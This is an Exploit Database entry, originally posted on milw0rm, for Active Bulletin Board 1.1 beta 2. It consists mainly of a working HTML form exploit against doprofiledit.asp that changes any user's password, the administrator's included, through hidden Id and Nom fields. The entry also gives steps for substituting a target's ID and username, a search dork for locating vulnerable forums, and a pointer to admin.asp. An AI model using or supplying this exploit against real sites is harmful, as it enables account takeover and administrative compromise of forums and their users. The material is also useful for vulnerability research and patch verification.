Active Bulletin Board <= 1.1b2 - Remote User Pass Change Exploit

2006-10-18T00:00:00
ID EDB-ID:2592
Type exploitdb
Reporter ajann
Modified 2006-10-18T00:00:00

Description

Active Bulletin Board <= 1.1b2 Remote User Pass Change Exploit. Webapps exploit for asp platform

                                        
                                            &lt;!--
# Title  :   Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
# Author :   ajann
# Dork   :   "Forum Active Bulletin Board version 1.1 béta 2"
# Greetz :   Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)

[Code]]]
--&gt;
&lt;html&gt;
&lt;body bgcolor="#000000"&gt;
&lt;form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"&gt;&lt;p&gt;&lt;b&gt;
&lt;font color="#FF0000" face="Verdana" size="2"&gt;Email: &lt;/font&gt;&lt;/b&gt;
&lt;input type="text" name="Email" size="30" value="ajann@ajann.com"&gt;&lt;br&gt;
&lt;font face="Verdana" size="2"&gt;&lt;b&gt;&lt;font color="#FF0000"&gt;Password:&lt;/font&gt;:&lt;/b&gt;&lt;/font&gt;
&lt;input type="text" name="Passe" size="30" value="123456"&gt; &lt;br&gt;
&lt;input type="submit" value="Submit" name="Envoyer"&gt;
&lt;input type="reset" value="Cancel" name="Effacer"&gt;
&lt;input type="hidden" name="Id" value="42"&gt;
&lt;input type="hidden" name="Nom" value="Administrateur"&gt;&lt;/p&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;

&lt;!--
[/Code]]]

Change: &lt;input type="hidden" name="Id" value="42"&gt; =&gt; ID
Change: &lt;input type="hidden" name="Nom" value="Administrateur"&gt; =&gt; UsrName

Next to admin.asp

#ajann,Turkey
#...

#Im Not Hacker!
--&gt;

# milw0rm.com [2006-10-18]